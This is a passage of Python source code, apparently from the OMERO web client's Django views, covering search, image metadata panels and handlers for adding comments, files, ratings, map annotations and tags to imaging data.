    the search (and, for purely numeric queries, an ID lookup too).
    """
    manager = BaseSearch(conn)
    foundById = []
    # form = 'form' if we are searching. Get query from request...
    r = request.GET
    if form is not None:
        query_search = r.get("query", None)
        if query_search is None:
            return HttpResponse("No search '?query' included")
        query_search = query_search.replace("+", " ")
        advanced = toBoolean(r.get("advanced"))
        # If this is an advanced search use 'advanced_search' for query
        # NOTE(review): if 'advanced_search' is missing, query_search
        # becomes None here — confirm callers always supply it.
        if advanced:
            query_search = r.get("advanced_search")
        template = "webclient/search/search_details.html"
        onlyTypes = r.getlist("datatype")
        fields = r.getlist("field")
        searchGroup = r.get("searchGroup", None)
        ownedBy = r.get("ownedBy", None)
        useAcquisitionDate = toBoolean(r.get("useAcquisitionDate"))
        startdate = r.get("startdateinput", None)
        startdate = startdate is not None and smart_str(startdate) or None
        enddate = r.get("enddateinput", None)
        enddate = enddate is not None and smart_str(enddate) or None
        date = None
        if startdate is not None:
            if enddate is None:
                # open-ended range: default the end date to today
                n = datetime.datetime.now()
                enddate = "%s-%02d-%02d" % (n.year, n.month, n.day)
            date = "%s_%s" % (startdate, enddate)
        # by default, if user has not specified any types:
        if len(onlyTypes) == 0:
            onlyTypes = ["images"]
        # search is carried out and results are stored in
        # manager.containers.images etc.
        manager.search(
            query_search,
            onlyTypes,
            fields,
            searchGroup,
            ownedBy,
            useAcquisitionDate,
            date,
            rawQuery=advanced,
        )
        # if the query is only numbers (separated by commas or spaces)
        # we search for objects by ID
        isIds = re.compile(r"^[\d ,]+$")
        if isIds.search(query_search) is not None:
            conn.SERVICE_OPTS.setOmeroGroup(-1)
            idSet = set()
            for queryId in re.split(" |,", query_search):
                if len(queryId) == 0:
                    continue
                try:
                    searchById = long(queryId)
                    if searchById in idSet:
                        continue
                    idSet.add(searchById)
                    for t in onlyTypes:
                        t = t[0:-1]  # remove 's'
                        if t in (
                            "project",
                            "dataset",
                            "image",
                            "screen",
                            "plate",
                            "well",
                        ):
                            obj = conn.getObject(t, searchById)
                            if obj is not None:
                                foundById.append({"otype": t, "obj": obj})
                except ValueError:
                    pass
    else:
        # simply display the search home page.
        template = "webclient/search/search.html"
    context = {
        "manager": manager,
        "foundById": foundById,
        "resultCount": manager.c_size + len(foundById),
    }
    context["template"] = template
    context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
    return context
@login_required()
@render_response()
def load_metadata_details(request, c_type, c_id, conn=None, share_id=None, **kwargs):
    """
    This page is the right-hand panel 'general metadata', first tab only.
    Shown for Projects, Datasets, Images, Screens, Plates, Wells, Tags etc.
    The data and annotations are loaded by the manager. Display of appropriate
    data is handled by the template.
    """
    # the index of a field within a well
    index = getIntOrDefault(request, "index", 0)
    context = dict()
    # we only expect a single object, but forms can take multiple objects.
    # Only the list matching c_type will be non-empty below.
    images = c_type == "image" and list(conn.getObjects("Image", [c_id])) or list()
    datasets = (
        c_type == "dataset" and list(conn.getObjects("Dataset", [c_id])) or list()
    )
    projects = (
        c_type == "project" and list(conn.getObjects("Project", [c_id])) or list()
    )
    screens = c_type == "screen" and list(conn.getObjects("Screen", [c_id])) or list()
    plates = c_type == "plate" and list(conn.getObjects("Plate", [c_id])) or list()
    acquisitions = (
        c_type == "acquisition"
        and list(conn.getObjects("PlateAcquisition", [c_id]))
        or list()
    )
    shares = (
        (c_type == "share" or c_type == "discussion")
        and [conn.getShare(c_id)]
        or list()
    )
    wells = c_type == "well" and list(conn.getObjects("Well", [c_id])) or list()
    # we simply set up the annotation form, passing the objects to be
    # annotated.
    selected = {
        "images": c_type == "image" and [c_id] or [],
        "datasets": c_type == "dataset" and [c_id] or [],
        "projects": c_type == "project" and [c_id] or [],
        "screens": c_type == "screen" and [c_id] or [],
        "plates": c_type == "plate" and [c_id] or [],
        "acquisitions": c_type == "acquisition" and [c_id] or [],
        "wells": c_type == "well" and [c_id] or [],
        "shares": ((c_type == "share" or c_type == "discussion") and [c_id] or []),
    }
    initial = {
        "selected": selected,
        "images": images,
        "datasets": datasets,
        "projects": projects,
        "screens": screens,
        "plates": plates,
        "acquisitions": acquisitions,
        "wells": wells,
        "shares": shares,
    }
    form_comment = None
    figScripts = None
    if c_type in ("share", "discussion"):
        template = "webclient/annotations/annotations_share.html"
        manager = BaseShare(conn, c_id)
        manager.getAllUsers(c_id)
        manager.getComments(c_id)
        form_comment = CommentAnnotationForm(initial=initial)
    else:
        try:
            manager = BaseContainer(conn, **{str(c_type): long(c_id), "index": index})
        except AttributeError as x:
            return handlerInternalError(request, x)
        if share_id is not None:
            template = "webclient/annotations/annotations_share.html"
            context["share"] = BaseShare(conn, share_id)
        else:
            template = "webclient/annotations/metadata_general.html"
            context["canExportAsJpg"] = manager.canExportAsJpg(request)
            context["annotationCounts"] = manager.getAnnotationCounts()
            figScripts = manager.listFigureScripts()
    context["manager"] = manager
    if c_type in ("tag", "tagset"):
        context["insight_ns"] = omero.rtypes.rstring(
            omero.constants.metadata.NSINSIGHTTAGSET
        ).val
    if form_comment is not None:
        context["form_comment"] = form_comment
    context["figScripts"] = figScripts
    context["template"] = template
    context["webclient_path"] = reverse("webindex")
    return context
@login_required()
@render_response()
def load_metadata_preview(request, c_type, c_id, conn=None, share_id=None, **kwargs):
    """
    This is the image 'Preview' tab for the right-hand panel.
    Builds one rendering-definition entry per owner (deduplicated) and
    serializes them into rdef query strings for the template.
    """
    context = {}
    # the index of a field within a well
    index = getIntOrDefault(request, "index", 0)
    manager = BaseContainer(conn, **{str(c_type): long(c_id)})
    if share_id:
        context["share"] = BaseShare(conn, share_id)
    if c_type == "well":
        manager.image = manager.well.getImage(index)
    allRdefs = manager.image.getAllRenderingDefs()
    rdefs = {}
    rdefId = manager.image.getRenderingDefId()
    # remove duplicates per user
    for r in allRdefs:
        ownerId = r["owner"]["id"]
        r["current"] = r["id"] == rdefId
        # if duplicate rdefs for user, pick one with highest ID
        if ownerId not in rdefs or rdefs[ownerId]["id"] < r["id"]:
            rdefs[ownerId] = r
    # NOTE: on Python 3 this is a dict view, not a list; it is only
    # iterated below and passed to the template.
    rdefs = rdefs.values()
    # format into rdef strings,
    # E.g. {c: '1|3118:35825$FF0000,2|2086:18975$FFFF00', m: 'c'}
    rdefQueries = []
    for r in rdefs:
        chs = []
        for i, c in enumerate(r["c"]):
            act = "-"
            if c["active"]:
                act = ""
            color = c["lut"] if "lut" in c else c["color"]
            reverse = "r" if c["inverted"] else "-r"
            chs.append(
                "%s%s|%s:%s%s$%s" % (act, i + 1, c["start"], c["end"], reverse, color)
            )
        rdefQueries.append(
            {
                "id": r["id"],
                "owner": r["owner"],
                "c": ",".join(chs),
                "m": r["model"] == "greyscale" and "g" or "c",
            }
        )
    # Flag images too large to render as a single plane.
    max_w, max_h = conn.getMaxPlaneSize()
    size_x = manager.image.getSizeX()
    size_y = manager.image.getSizeY()
    context["tiledImage"] = (size_x * size_y) > (max_w * max_h)
    context["manager"] = manager
    context["rdefsJson"] = json.dumps(rdefQueries)
    context["rdefs"] = rdefs
    context["template"] = "webclient/annotations/metadata_preview.html"
    return context
@login_required()
@render_response()
def load_metadata_hierarchy(request, c_type, c_id, conn=None, **kwargs):
    """
    Load the ancestors of the specified object for display in a static
    tree. Used by an AJAX call from the metadata_general panel.
    """
    container = BaseContainer(conn, **{str(c_type): long(c_id)})
    return {
        "manager": container,
        "template": "webclient/annotations/metadata_hierarchy.html",
    }
@login_required()
@render_response()
def load_metadata_acquisition(
    request, c_type, c_id, conn=None, share_id=None, **kwargs
):
    """
    The acquisition tab of the right-hand panel. Only loaded for images.
    TODO: urls regex should make sure that c_type is only 'image' OR 'well'

    Builds (unbound) metadata display forms for the image's channels,
    objective, environment, stage label and instrument components.
    """
    try:
        if c_type in ("share", "discussion"):
            template = "webclient/annotations/annotations_share.html"
            manager = BaseShare(conn, c_id)
            manager.getAllUsers(c_id)
            manager.getComments(c_id)
        else:
            template = "webclient/annotations/metadata_acquisition.html"
            manager = BaseContainer(conn, **{str(c_type): long(c_id)})
    except AttributeError as x:
        return handlerInternalError(request, x)
    form_environment = None
    form_objective = None
    form_microscope = None
    form_instrument_objectives = list()
    form_stageLabel = None
    form_filters = list()
    form_dichroics = list()
    form_detectors = list()
    form_channels = list()
    form_lasers = list()
    lasertypes = list(conn.getEnumerationEntries("LaserType"))
    arctypes = list(conn.getEnumerationEntries("ArcType"))
    filamenttypes = list(conn.getEnumerationEntries("FilamentType"))
    # various enums we need for the forms (don't load unless needed)
    mediums = None
    immersions = None
    corrections = None
    if c_type == "image":
        if share_id is None:
            manager.companionFiles()
        manager.channelMetadata()
        # Build one form bundle per channel (light path, detector,
        # light source, plane timing info).
        for theC, ch in enumerate(manager.channel_metadata):
            logicalChannel = ch.getLogicalChannel()
            if logicalChannel is not None:
                channel = dict()
                channel["form"] = MetadataChannelForm(
                    initial={
                        "logicalChannel": logicalChannel,
                        "exWave": ch.getExcitationWave(units=True),
                        "emWave": ch.getEmissionWave(units=True),
                        "illuminations": list(
                            conn.getEnumerationEntries("IlluminationI")
                        ),
                        "contrastMethods": list(
                            conn.getEnumerationEntries("ContrastMethodI")
                        ),
                        "modes": list(conn.getEnumerationEntries("AcquisitionModeI")),
                    },
                    auto_id=False,
                )
                # 9853 Much metadata is not available to 'shares'
                if share_id is None:
                    lightPath = logicalChannel.getLightPath()
                    if lightPath is not None:
                        channel["form_dichroic"] = None
                        channel["form_excitation_filters"] = list()
                        channel["form_emission_filters"] = list()
                        lightPathDichroic = lightPath.getDichroic()
                        if lightPathDichroic is not None:
                            channel["form_dichroic"] = MetadataDichroicForm(
                                initial={"dichroic": lightPathDichroic}
                            )
                        filterTypes = list(conn.getEnumerationEntries("FilterTypeI"))
                        for f in lightPath.getEmissionFilters():
                            channel["form_emission_filters"].append(
                                MetadataFilterForm(
                                    initial={"filter": f, "types": filterTypes}
                                )
                            )
                        for f in lightPath.getExcitationFilters():
                            channel["form_excitation_filters"].append(
                                MetadataFilterForm(
                                    initial={"filter": f, "types": filterTypes}
                                )
                            )
                    detectorSettings = logicalChannel.getDetectorSettings()
                    if (
                        detectorSettings._obj is not None
                        and detectorSettings.getDetector()
                    ):
                        channel["form_detector_settings"] = MetadataDetectorForm(
                            initial={
                                "detectorSettings": detectorSettings,
                                "detector": detectorSettings.getDetector(),
                                "types": list(
                                    conn.getEnumerationEntries("DetectorTypeI")
                                ),
                                "binnings": list(conn.getEnumerationEntries("Binning")),
                            }
                        )
                    lightSourceSettings = logicalChannel.getLightSourceSettings()
                    if (
                        lightSourceSettings is not None
                        and lightSourceSettings._obj is not None
                    ):
                        lightSrc = lightSourceSettings.getLightSource()
                        if lightSrc is not None:
                            # pick the enum list matching the source class
                            lstypes = lasertypes
                            if lightSrc.OMERO_CLASS == "Arc":
                                lstypes = arctypes
                            elif lightSrc.OMERO_CLASS == "Filament":
                                lstypes = filamenttypes
                            channel["form_light_source"] = MetadataLightSourceForm(
                                initial={
                                    "lightSource": lightSrc,
                                    "lightSourceSettings": lightSourceSettings,
                                    "lstypes": lstypes,
                                    "mediums": list(
                                        conn.getEnumerationEntries("LaserMediumI")
                                    ),
                                    "pulses": list(
                                        conn.getEnumerationEntries("PulseI")
                                    ),
                                }
                            )
                # TODO: We don't display filter sets here yet since they are
                # not populated on Import by BioFormats.
                channel["label"] = ch.getLabel()
                color = ch.getColor()
                channel["color"] = color is not None and color.getHtml() or None
                planeInfo = (
                    manager.image
                    and manager.image.getPrimaryPixels().copyPlaneInfo(
                        theC=theC, theZ=0
                    )
                )
                plane_info = []
                # per-timepoint delta-T / exposure for this channel at Z=0
                for pi in planeInfo:
                    deltaT = pi.getDeltaT(units="SECOND")
                    exposure = pi.getExposureTime(units="SECOND")
                    if deltaT is None and exposure is None:
                        continue
                    if deltaT is not None:
                        deltaT = deltaT.getValue()
                    if exposure is not None:
                        exposure = exposure.getValue()
                    plane_info.append(
                        {"theT": pi.theT, "deltaT": deltaT, "exposureTime": exposure}
                    )
                channel["plane_info"] = plane_info
                form_channels.append(channel)
        # For wells, use the image of the first well sample; otherwise
        # fall back to the manager's image.
        try:
            image = manager.well.getWellSample().image()
        except Exception:
            image = manager.image
        if share_id is None:  # 9853
            if image.getObjectiveSettings() is not None:
                # load the enums if needed and create our Objective Form
                if mediums is None:
                    mediums = list(conn.getEnumerationEntries("MediumI"))
                if immersions is None:
                    immersions = list(conn.getEnumerationEntries("ImmersionI"))
                if corrections is None:
                    corrections = list(conn.getEnumerationEntries("CorrectionI"))
                form_objective = MetadataObjectiveSettingsForm(
                    initial={
                        "objectiveSettings": image.getObjectiveSettings(),
                        "objective": image.getObjectiveSettings().getObjective(),
                        "mediums": mediums,
                        "immersions": immersions,
                        "corrections": corrections,
                    }
                )
            if image.getImagingEnvironment() is not None:
                form_environment = MetadataEnvironmentForm(initial={"image": image})
            if image.getStageLabel() is not None:
                form_stageLabel = MetadataStageLabelForm(initial={"image": image})
            # Instrument-level forms: microscope, objectives, filters,
            # dichroics, detectors and light sources.
            instrument = image.getInstrument()
            if instrument is not None:
                if instrument.getMicroscope() is not None:
                    form_microscope = MetadataMicroscopeForm(
                        initial={
                            "microscopeTypes": list(
                                conn.getEnumerationEntries("MicroscopeTypeI")
                            ),
                            "microscope": instrument.getMicroscope(),
                        }
                    )
                objectives = instrument.getObjectives()
                for o in objectives:
                    # load the enums if needed and create our Objective Form
                    if mediums is None:
                        mediums = list(conn.getEnumerationEntries("MediumI"))
                    if immersions is None:
                        immersions = list(conn.getEnumerationEntries("ImmersionI"))
                    if corrections is None:
                        corrections = list(conn.getEnumerationEntries("CorrectionI"))
                    obj_form = MetadataObjectiveForm(
                        initial={
                            "objective": o,
                            "mediums": mediums,
                            "immersions": immersions,
                            "corrections": corrections,
                        },
                        auto_id=False,
                    )
                    form_instrument_objectives.append(obj_form)
                filters = list(instrument.getFilters())
                if len(filters) > 0:
                    for f in filters:
                        form_filter = MetadataFilterForm(
                            initial={
                                "filter": f,
                                "types": list(
                                    conn.getEnumerationEntries("FilterTypeI")
                                ),
                            },
                            auto_id=False,
                        )
                        form_filters.append(form_filter)
                dichroics = list(instrument.getDichroics())
                for d in dichroics:
                    form_dichroic = MetadataDichroicForm(
                        initial={"dichroic": d}, auto_id=False
                    )
                    form_dichroics.append(form_dichroic)
                detectors = list(instrument.getDetectors())
                if len(detectors) > 0:
                    for d in detectors:
                        form_detector = MetadataDetectorForm(
                            initial={
                                "detectorSettings": None,
                                "detector": d,
                                "types": list(
                                    conn.getEnumerationEntries("DetectorTypeI")
                                ),
                            },
                            auto_id=False,
                        )
                        form_detectors.append(form_detector)
                lasers = list(instrument.getLightSources())
                if len(lasers) > 0:
                    for laser in lasers:
                        lstypes = lasertypes
                        if laser.OMERO_CLASS == "Arc":
                            lstypes = arctypes
                        elif laser.OMERO_CLASS == "Filament":
                            lstypes = filamenttypes
                        form_laser = MetadataLightSourceForm(
                            initial={
                                "lightSource": laser,
                                "lstypes": lstypes,
                                "mediums": list(
                                    conn.getEnumerationEntries("LaserMediumI")
                                ),
                                "pulses": list(conn.getEnumerationEntries("PulseI")),
                            },
                            auto_id=False,
                        )
                        form_lasers.append(form_laser)
    # TODO: remove this 'if' since we should only have c_type = 'image'?
    context = {"manager": manager, "share_id": share_id}
    if c_type not in ("share", "discussion", "tag"):
        context["form_channels"] = form_channels
        context["form_environment"] = form_environment
        context["form_objective"] = form_objective
        context["form_microscope"] = form_microscope
        context["form_instrument_objectives"] = form_instrument_objectives
        context["form_filters"] = form_filters
        context["form_dichroics"] = form_dichroics
        context["form_detectors"] = form_detectors
        context["form_lasers"] = form_lasers
        context["form_stageLabel"] = form_stageLabel
    context["template"] = template
    return context
@login_required()
@render_response()
def load_original_metadata(request, imageId, conn=None, share_id=None, **kwargs):
    """
    Load the 'Original Metadata' of an image for display.

    Returns a template context dict (rendered by render_response()), or a
    plain 408 response when reading the metadata times out server-side.
    """
    img = conn.getObject("Image", imageId)
    if img is None:
        raise Http404("No Image found with ID %s" % imageId)
    ctx = {
        "template": "webclient/annotations/original_metadata.html",
        "imageId": img.getId(),
    }
    try:
        metadata = img.loadOriginalMetadata()
    except omero.LockTimeout:
        # 408 is Request Timeout
        return HttpResponse(content="LockTimeout", status=408)
    if metadata is not None:
        # metadata is a 3-tuple: (original, global, series)
        ctx["original_metadata"] = metadata[0]
        ctx["global_metadata"] = metadata[1]
        ctx["series_metadata"] = metadata[2]
    return ctx
###########################################################################
# ACTIONS
# Annotation in the right-hand panel is handled the same way for single
# objects (metadata_general.html)
# AND for batch annotation (batch_annotate.html) by 4 forms:
# Comment (this is loaded in the initial page)
# Tags (the empty form is in the initial page but fields are loaded via AJAX)
# Local File (this is loaded in the initial page)
# Existing File (the empty form is in the initial page but field is loaded via
# AJAX)
#
# In each case, the form itself contains hidden fields to specify the
# object(s) being annotated
# All forms inherit from a single form that has these fields.
def getObjects(request, conn=None):
    """
    Prepare objects for use in the annotation forms.
    These objects are required by the form superclass to populate hidden
    fields, so we know what we're annotating on submission.

    @param request: Django request; object IDs are read from GET or POST
                    params named "image", "dataset", "project", etc.
    @param conn:    gateway connection used to load the objects
    @return:        dict mapping each type name to a list of loaded
                    objects ([] where no IDs were supplied)
    """
    r = request.GET or request.POST

    def _load(dtype, param):
        # Load all objects of `dtype` whose IDs appear in the request
        # parameter `param`, or [] when the parameter is absent/empty.
        # (Replaces the fragile `cond and X or Y` idiom used previously.)
        ids = r.getlist(param)
        return list(conn.getObjects(dtype, ids)) if len(ids) > 0 else list()

    # Shares are looked up individually; only the first share ID is used
    share_ids = r.getlist("share")
    shares = [conn.getShare(share_ids[0])] if len(share_ids) > 0 else list()
    return {
        "image": _load("Image", "image"),
        "dataset": _load("Dataset", "dataset"),
        "project": _load("Project", "project"),
        "screen": _load("Screen", "screen"),
        "plate": _load("Plate", "plate"),
        "acquisition": _load("PlateAcquisition", "acquisition"),
        "well": _load("Well", "well"),
        "share": shares,
    }
def getIds(request):
    """
    Used by forms to indicate the currently selected objects prepared above.

    Returns a dict of {plural type name: list of ID strings} read from the
    request's GET (or, failing that, POST) parameters.
    """
    params = request.GET or request.POST
    selection = {}
    for plural, param in (
        ("images", "image"),
        ("datasets", "dataset"),
        ("projects", "project"),
        ("screens", "screen"),
        ("plates", "plate"),
        ("acquisitions", "acquisition"),
        ("wells", "well"),
        ("shares", "share"),
    ):
        selection[plural] = params.getlist(param)
    return selection
@login_required()
@render_response()
def batch_annotate(request, conn=None, **kwargs):
    """
    This page gives a form for batch annotation.
    Local File form and Comment form are loaded. Other forms are loaded via
    AJAX.

    Objects to annotate are specified via query parameters, e.g.
    ?image=1&image=2&dataset=3 (see getObjects()).
    Returns a template context dict, rendered by render_response().
    """
    objs = getObjects(request, conn)
    # get groups for selected objects - setGroup() and create links
    obj_ids = []
    obj_labels = []
    groupIds = set()
    annotationBlocked = False  # False, or a string message explaining why
    for key in objs:
        obj_ids += ["%s=%s" % (key, o.id) for o in objs[key]]
        for o in objs[key]:
            groupIds.add(o.getDetails().group.id.val)
            if not o.canAnnotate():
                annotationBlocked = (
                    "Can't add annotations because you don't" " have permissions"
                )
            obj_labels.append({"type": key.title(), "id": o.id, "name": o.getName()})
    obj_string = "&".join(obj_ids)
    link_string = "|".join(obj_ids).replace("=", "-")
    if len(groupIds) == 0:
        # No supported objects found.
        # If multiple tags / tagsets selected, return placeholder
        if (
            len(request.GET.getlist("tag")) > 0
            or len(request.GET.getlist("tagset")) > 0
        ):
            return HttpResponse("<h2>Can't batch annotate tags</h2>")
        else:
            return handlerInternalError(request, "No objects found")
    # Use an arbitrary group from the set to switch context; if objects span
    # multiple groups, annotation is blocked below anyway.
    groupId = list(groupIds)[0]
    conn.SERVICE_OPTS.setOmeroGroup(groupId)
    manager = BaseContainer(conn)
    figScripts = manager.listFigureScripts(objs)
    canExportAsJpg = manager.canExportAsJpg(request, objs)
    # Summarise fileset + archived file counts/sizes for any selected images
    filesetInfo = None
    iids = []
    if "image" in objs and len(objs["image"]) > 0:
        iids = [i.getId() for i in objs["image"]]
    if len(iids) > 0:
        filesetInfo = conn.getFilesetFilesInfo(iids)
        archivedInfo = conn.getArchivedFilesInfo(iids)
        filesetInfo["count"] += archivedInfo["count"]
        filesetInfo["size"] += archivedInfo["size"]
    context = {
        "iids": iids,
        "obj_string": obj_string,
        "link_string": link_string,
        "obj_labels": obj_labels,
        "batch_ann": True,
        "figScripts": figScripts,
        "canExportAsJpg": canExportAsJpg,
        "filesetInfo": filesetInfo,
        "annotationBlocked": annotationBlocked,
        "differentGroups": False,
    }
    if len(groupIds) > 1:
        context["annotationBlocked"] = (
            "Can't add annotations because" " objects are in different groups"
        )
        context["differentGroups"] = True  # E.g. don't run scripts etc
    context["canDownload"] = manager.canDownload(objs)
    context["template"] = "webclient/annotations/batch_annotate.html"
    context["webclient_path"] = reverse("webindex")
    context["annotationCounts"] = manager.getBatchAnnotationCounts(
        getObjects(request, conn)
    )
    return context
@login_required()
@render_response()
def annotate_file(request, conn=None, **kwargs):
    """
    On 'POST', this handles attaching an existing file-annotation(s) and/or
    upload of a new file to one or more objects.
    Otherwise it generates the form for choosing file-annotations & local
    files.

    Objects are specified by query/POST params (see getObjects()).
    Returns JSON on POST, or a template context dict on GET.
    """
    oids = getObjects(request, conn)
    selected = getIds(request)
    initial = {
        "selected": selected,
        "images": oids["image"],
        "datasets": oids["dataset"],
        "projects": oids["project"],
        "screens": oids["screen"],
        "plates": oids["plate"],
        "acquisitions": oids["acquisition"],
        "wells": oids["well"],
    }
    # Use the first object we find to set context (assume all objects are in
    # same group!)
    for obs in oids.values():
        if len(obs) > 0:
            conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
            break
    obj_count = sum([len(selected[types]) for types in selected])
    if obj_count == 0:
        raise Http404("Need to specify objects via e.g. ?image=1")
    # Get appropriate manager, either to list available Files to add to single
    # object, or list ALL Files (multiple objects)
    manager = None
    if obj_count == 1:
        # Find the single selected type/id pair
        for t in selected:
            if len(selected[t]) > 0:
                o_type = t[:-1]  # "images" -> "image"
                o_id = selected[t][0]
                break
        if o_type in (
            "dataset",
            "project",
            "image",
            "screen",
            "plate",
            "acquisition",
            "well",
            "comment",
            "file",
            "tag",
            "tagset",
        ):
            if o_type == "tagset":
                # TODO: this should be handled by the BaseContainer
                o_type = "tag"
            kw = {}
            if o_type is not None and int(o_id) > 0:
                kw[str(o_type)] = int(o_id)
            try:
                manager = BaseContainer(conn, **kw)
            except AttributeError as x:
                return handlerInternalError(request, x)
    if manager is not None:
        # Single object: list files already attached to it
        files = manager.getFilesByObject()
    else:
        manager = BaseContainer(conn)
        for dtype, objs in oids.items():
            if len(objs) > 0:
                # NB: we only support a single data-type now. E.g. 'image' OR
                # 'dataset' etc.
                files = manager.getFilesByObject(
                    parent_type=dtype, parent_ids=[o.getId() for o in objs]
                )
                break
    initial["files"] = files
    if request.method == "POST":
        # handle form submission
        form_file = FilesAnnotationForm(initial=initial, data=request.POST.copy())
        if form_file.is_valid():
            # Link existing files...
            files = form_file.cleaned_data["files"]
            added_files = []
            if files is not None and len(files) > 0:
                added_files = manager.createAnnotationsLinks("file", files, oids)
            # upload new file
            fileupload = (
                "annotation_file" in request.FILES
                and request.FILES["annotation_file"]
                or None
            )
            if fileupload is not None and fileupload != "":
                newFileId = manager.createFileAnnotations(fileupload, oids)
                added_files.append(newFileId)
            return JsonResponse({"fileIds": added_files})
        else:
            return HttpResponse(form_file.errors)
    else:
        form_file = FilesAnnotationForm(initial=initial)
    context = {"form_file": form_file}
    template = "webclient/annotations/files_form.html"
    context["template"] = template
    return context
@login_required()
@render_response()
def annotate_rating(request, conn=None, **kwargs):
    """
    Handle adding Rating to one or more objects.

    POST only. The rating value is read from the "rating" POST parameter
    (default 0); the target objects from the usual type params
    (see getObjects()). Returns JSON {"success": True}.
    """
    if request.method != "POST":
        raise Http404("Only POST supported")
    rating = getIntOrDefault(request, "rating", 0)
    oids = getObjects(request, conn)
    # add / update rating on every selected object
    # (iterate values() directly - the type key was previously read and unused)
    for objs in oids.values():
        for o in objs:
            o.setRating(rating)
    # return a summary of ratings
    return JsonResponse({"success": True})
@login_required()
@render_response()
def annotate_comment(request, conn=None, **kwargs):
    """Handle adding Comments to one or more objects.

    Unbound instance of Comment form not available.
    If the form has been submitted, a bound instance of the form
    is created using request.POST.
    For shares, returns a template context to render the comment HTML;
    otherwise returns JSON with the new annotation ID.
    """
    if request.method != "POST":
        raise Http404("Unbound instance of form not available.")
    oids = getObjects(request, conn)
    selected = getIds(request)
    initial = {
        "selected": selected,
        "images": oids["image"],
        "datasets": oids["dataset"],
        "projects": oids["project"],
        "screens": oids["screen"],
        "plates": oids["plate"],
        "acquisitions": oids["acquisition"],
        "wells": oids["well"],
        "shares": oids["share"],
    }
    # Use the first object we find to set context (assume all objects are in
    # same group!) this does not apply to shares
    if len(oids["share"]) < 1:
        for obs in oids.values():
            if len(obs) > 0:
                conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
                break
    # Handle form submission...
    form_multi = CommentAnnotationForm(initial=initial, data=request.POST.copy())
    if form_multi.is_valid():
        # In each case below, we pass the {'object_type': [ids]} map
        content = form_multi.cleaned_data["comment"]
        if content is not None and content != "":
            if oids["share"] is not None and len(oids["share"]) > 0:
                sid = oids["share"][0].id
                manager = BaseShare(conn, sid)
                host = "%s?server=%i" % (
                    request.build_absolute_uri(
                        reverse("load_template", args=["public"])
                    ),
                    int(conn.server_id),
                )
                textAnn = manager.addComment(host, content)
                # For shares we need to return html for display...
                context = {
                    "tann": textAnn,
                    "added_by": conn.getUserId(),
                    "template": "webclient/annotations/comment.html",
                }
            else:
                # ...otherwise Comments are re-loaded by AJAX json
                # so we don't *need* to return anything
                manager = BaseContainer(conn)
                annId = manager.createCommentAnnotations(content, oids)
                context = {"annId": annId, "added_by": conn.getUserId()}
        # NOTE(review): if the validated comment is empty, 'context' is never
        # assigned and this raises NameError - presumably the form rejects
        # empty comments before we get here; verify against the form class.
        return context
    else:
        # TODO: handle invalid form error
        return HttpResponse(str(form_multi.errors))
@login_required()
@render_response()
def annotate_map(request, conn=None, **kwargs):
    """
    Handle adding Map Annotations to one or more objects.
    POST data "mapAnnotation" should be list of ['key':'value'] pairs.

    If "annId" IDs are posted, those annotations are updated (or deleted
    when the new data is empty); otherwise new annotation(s) are created
    and linked to all objects specified in the request (see getObjects()).
    Returns JSON {"annId": [ids]} (or {"annId": None} after deletion).
    """
    if request.method != "POST":
        raise Http404(
            "Need to POST map annotation data as list of" " ['key', 'value'] pairs"
        )
    oids = getObjects(request, conn)
    # Use the first object we find to set context (assume all objects are in
    # same group!)
    # this does not apply to shares
    if len(oids["share"]) < 1:
        for obs in oids.values():
            if len(obs) > 0:
                conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
                break
    data = request.POST.get("mapAnnotation")
    data = json.loads(data)
    annIds = request.POST.getlist("annId")
    ns = request.POST.get("ns", omero.constants.metadata.NSCLIENTMAPANNOTATION)
    # Create a new annotation
    if len(annIds) == 0 and len(data) > 0:
        # Bug fix: previously the result of this comparison was discarded,
        # leaving 'duplicate' as a (truthy) string so the duplicate branch
        # always ran. Parse the POST flag into a real boolean.
        duplicate = request.POST.get("duplicate", "false").lower() == "true"
        # For 'client' map annotations, we enforce 1 annotation per object
        if ns == omero.constants.metadata.NSCLIENTMAPANNOTATION:
            duplicate = True
        if duplicate:
            # Create a new Map Annotation for each object:
            for k, objs in oids.items():
                for obj in objs:
                    ann = omero.gateway.MapAnnotationWrapper(conn)
                    ann.setValue(data)
                    ann.setNs(ns)
                    ann.save()
                    annIds.append(ann.getId())
                    obj.linkAnnotation(ann)
        else:
            # Create single Map Annotation and link to all objects
            ann = omero.gateway.MapAnnotationWrapper(conn)
            ann.setValue(data)
            ann.setNs(ns)
            ann.save()
            annIds.append(ann.getId())
            for k, objs in oids.items():
                for obj in objs:
                    obj.linkAnnotation(ann)
    # Or update existing annotations
    else:
        for annId in annIds:
            ann = conn.getObject("MapAnnotation", annId)
            if ann is None:
                continue
            if len(data) > 0:
                ann.setValue(data)
                ann.save()
            else:
                # Delete if no data
                handle = conn.deleteObjects("/Annotation", [annId])
                try:
                    conn._waitOnCmd(handle)
                finally:
                    handle.close()
    if len(data) == 0:
        annIds = None
    return {"annId": annIds}
@login_required()
@render_response()
def marshal_tagging_form_data(request, conn=None, **kwargs):
    """
    Provides json data to ome.tagging_form.js

    The "jsonmode" GET param selects what is returned: "tagcount",
    "tags" (tuples without descriptions), "desc" (id -> description),
    or "owners" (owner info). Anything else gives an empty response.
    """
    group_id = get_long_or_default(request, "group", -1)
    conn.SERVICE_OPTS.setOmeroGroup(str(group_id))
    # Pagination: both become None when 'offset' is absent or unparseable
    try:
        page_offset = int(request.GET.get("offset"))
        page_limit = int(request.GET.get("limit", 1000))
    except Exception:
        page_offset = page_limit = None
    jsonmode = request.GET.get("jsonmode")
    if jsonmode == "tagcount":
        return dict(tag_count=conn.getTagCount())
    manager = BaseContainer(conn)
    manager.loadTagsRecursive(eid=-1, offset=page_offset, limit=page_limit)
    recursive_tags = manager.tags_recursive
    recursive_owners = manager.tags_recursive_owners
    if jsonmode == "tags":
        # send tag information without descriptions
        return [(i, t, o, s) for i, d, t, o, s in recursive_tags]
    if jsonmode == "desc":
        # send descriptions for tags
        return {i: d for i, d, t, o, s in recursive_tags}
    if jsonmode == "owners":
        # send owner information
        return recursive_owners
    return HttpResponse()
@login_required()
@render_response()
def annotate_tags(request, conn=None, **kwargs):
    """
    This handles creation AND submission of Tags form, adding new AND/OR
    existing tags to one or more objects.

    GET returns a template context with the tagging form; POST links/unlinks
    tags and returns JSON {"added": ..., "removed": ..., "new": ...}.
    """
    oids = getObjects(request, conn)
